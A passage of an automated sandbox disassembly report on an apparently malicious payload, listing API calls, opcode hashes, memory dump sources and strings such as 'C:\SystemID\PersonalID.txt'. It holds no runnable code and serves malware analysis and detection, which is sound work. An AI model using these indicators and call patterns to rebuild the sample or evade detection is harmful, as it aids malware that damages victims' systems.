                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 610490371-2616962270
                                                                                                        • Opcode ID: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction ID: 0922b072f7bd7781445a5081a131b6321a65a6d68e2f3b61e790d0e3b3de6491
                                                                                                        • Opcode Fuzzy Hash: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction Fuzzy Hash: A0E0867568431E67EB20EBB0DC8AFD9776C9B04B01F000093BB48D60C0D6B0A584DAD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strtok
                                                                                                        • String ID:
                                                                                                        • API String ID: 3446180046-0
                                                                                                        • Opcode ID: 734e3ab566bfa8620fed5bd0c63eb1b245ad99d2e0b032a3aa3ebb2ccb2245ad
                                                                                                        • Instruction ID: b0f79aa3d1308da9fc350e7dc9b8b72b98a34c2bc32db489243af673e7059d1f
                                                                                                        • Opcode Fuzzy Hash: 734e3ab566bfa8620fed5bd0c63eb1b245ad99d2e0b032a3aa3ebb2ccb2245ad
                                                                                                        • Instruction Fuzzy Hash: 9881ACB1A00206DFEB14DF58D9807EEBBF1FF14314F14492DE80697281D7BAAA94DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2974526305-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F4C6AD
                                                                                                        • __isleadbyte_l.LIBCMT ref: 00F4C6DB
                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F4C709
                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F4C73F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00F1F125
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00F1F198
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00F1F1A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F1F1A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1421093161-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00FD70AB
                                                                                                          • Part of subcall function 00FD77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00FD77D2
                                                                                                          • Part of subcall function 00FD77A0: ___AdjustPointer.LIBCMT ref: 00FD77E9
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00FD70C2
                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00FD70D4
                                                                                                        • CallCatchBlock.LIBCMT ref: 00FD70F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 2901542994-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F35007: __getptd_noexit.LIBCMT ref: 00F35008
                                                                                                          • Part of subcall function 00F35007: __amsg_exit.LIBCMT ref: 00F35015
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35A01
                                                                                                          • Part of subcall function 00F38C96: __calloc_impl.LIBCMT ref: 00F38CA5
                                                                                                        • __lock.LIBCMT ref: 00F35A37
                                                                                                        • ___addlocaleref.LIBCMT ref: 00F35A43
                                                                                                        • __lock.LIBCMT ref: 00F35A57
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580527540-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32 ref: 00F227B9
                                                                                                        • _malloc.LIBCMT ref: 00F227C3
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F227CE
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00F227E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3705855051-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32 ref: 00F22806
                                                                                                        • _malloc.LIBCMT ref: 00F22814
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F2281F
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00F22832
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3705855051-0
                                                                                                        • Opcode ID: 0425119418060a185f1675dee5b3951312f96b91e1490b26333ecec88dd7fc52
                                                                                                        • Instruction ID: febcf9d74a17deaa687e1e70fc128a6275dd813220bf3766dde3c18c2c0a915a
                                                                                                        • Opcode Fuzzy Hash: 0425119418060a185f1675dee5b3951312f96b91e1490b26333ecec88dd7fc52
                                                                                                        • Instruction Fuzzy Hash: 27E086763021297BE51023696C4EFAB761DCBC27B5F100212F611D22D2CA951C01D1F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 84edcd21fafd6f3ad32d636f6edfe323f37f9a45acc2d9bc441904207452c19f
                                                                                                        • Instruction ID: 0869fcbf4c9f62750f0b932e87fd1b958eed4886530623832c47f87a55cceabb
                                                                                                        • Opcode Fuzzy Hash: 84edcd21fafd6f3ad32d636f6edfe323f37f9a45acc2d9bc441904207452c19f
                                                                                                        • Instruction Fuzzy Hash: BAC15E71700229DBCB24CF5CE8C09AAB3B6FF88300B20456DE8468B655DBB4FD55EB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: ea60f3f99ec12e6b5cc474d4c9b2a1f4ac40836337345308c3e5bd0c8ee76a76
                                                                                                        • Instruction ID: cff4ec7d2eb6cbc8120ade880556ce54ca9e6b10145f2466794e2e9287577f8d
                                                                                                        • Opcode Fuzzy Hash: ea60f3f99ec12e6b5cc474d4c9b2a1f4ac40836337345308c3e5bd0c8ee76a76
                                                                                                        • Instruction Fuzzy Hash: BE51BE317087299BCF24EF18E8809AEB7B6FF84310B60456DE8458B251DB31ED55ABE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F2B1BA
                                                                                                          • Part of subcall function 00F211C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 00F2120F
                                                                                                          • Part of subcall function 00F211C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00F21228
                                                                                                          • Part of subcall function 00F211C0: CloseHandle.KERNEL32(00000000), ref: 00F2123D
                                                                                                          • Part of subcall function 00F211C0: MoveFileW.KERNEL32(?,?), ref: 00F21277
                                                                                                          • Part of subcall function 00F2BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                          • Part of subcall function 00F2BA10: RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                          • Part of subcall function 00F2BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B4B3
                                                                                                        • TranslateMessage.USER32(?), ref: 00F2B4CD
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2B4D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                        • API String ID: 441990211-897913220
                                                                                                        • Opcode ID: fd0c8461a7ccc98b94fea5620713b1a7cfe511e1b78d88b48eb74291d0e4f452
                                                                                                        • Instruction ID: b4cd53832a4b4917778b0a535cd20697718324d844a971e01dcf81abe3ab5a0a
                                                                                                        • Opcode Fuzzy Hash: fd0c8461a7ccc98b94fea5620713b1a7cfe511e1b78d88b48eb74291d0e4f452
                                                                                                        • Instruction Fuzzy Hash: 985137715142549BC718FB60EC52AEFB7A8BF94344F80491DF886431A2EF3CA619DBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        • Opcode ID: 22be7e925578322317a2e254195904bfb5bbee497444d885576350051d9aa381
                                                                                                        • Instruction ID: c2f202b5848a5abe2f7570d544c50872fe37d55eea23359c692cd5efd953d443
                                                                                                        • Opcode Fuzzy Hash: 22be7e925578322317a2e254195904bfb5bbee497444d885576350051d9aa381
                                                                                                        • Instruction Fuzzy Hash: 7F2107B6F443217BE200666CFC92B25B399EB94B14F004125F718EB2C1D6B4FC1197D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F23CA0
                                                                                                          • Part of subcall function 00F33B4C: _malloc.LIBCMT ref: 00F33B64
                                                                                                        • _memset.LIBCMT ref: 00F23C83
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                        • String ID: vector<T> too long
                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                        • Opcode ID: b79e61f5db3da0874f55e1d095cbcda5e799c13574f4871ac57ce446e45df37b
                                                                                                        • Instruction ID: 131b50013e31c66600f6491ecfa7c810c8ac822c7be1eef5c44ff4ce90be11a9
                                                                                                        • Opcode Fuzzy Hash: b79e61f5db3da0874f55e1d095cbcda5e799c13574f4871ac57ce446e45df37b
                                                                                                        • Instruction Fuzzy Hash: ED01B1F29007105BE330AF19E801757F7E8AF40B70F14842DE99997681E7B9E948D791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2590308727-54166481
                                                                                                        • Opcode ID: 36de37488238e83def194c8b2af580738d6f8e86a3a7bb8beab58ca2f877ce0c
                                                                                                        • Instruction ID: b987bced7b68c86a169a4428d9dca62998358cf9978f9389f99ea70dd60efbff
                                                                                                        • Opcode Fuzzy Hash: 36de37488238e83def194c8b2af580738d6f8e86a3a7bb8beab58ca2f877ce0c
                                                                                                        • Instruction Fuzzy Hash: 7B112772E803159BDF31DF68DC523CE77A0AF10724F040529EC5952181E77A9A94ABC2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00F30E13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __calloc_crt
                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                        • API String ID: 3494438863-969893948
                                                                                                        • Opcode ID: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction ID: 788743a592a0546ae71b4a40a1045eb91d6fa60b5a0de4bf7b1bb56b7f569e9a
                                                                                                        • Opcode Fuzzy Hash: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction Fuzzy Hash: FCF0A471709211DBE734DA6ABC21BA137D8B715770F10441BF280CB188EF7D88816794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F90686
                                                                                                          • Part of subcall function 00F64C00: _raise.LIBCMT ref: 00F64C18
                                                                                                        Strings
                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00F9062E
                                                                                                        • .\crypto\evp\digest.c, xrefs: 00F90638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset_raise
                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                        • Opcode ID: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction ID: 6e3f65c682a5d630d58f9931d5508eeecda024f9ad8d83db3ca882233a9ebdce
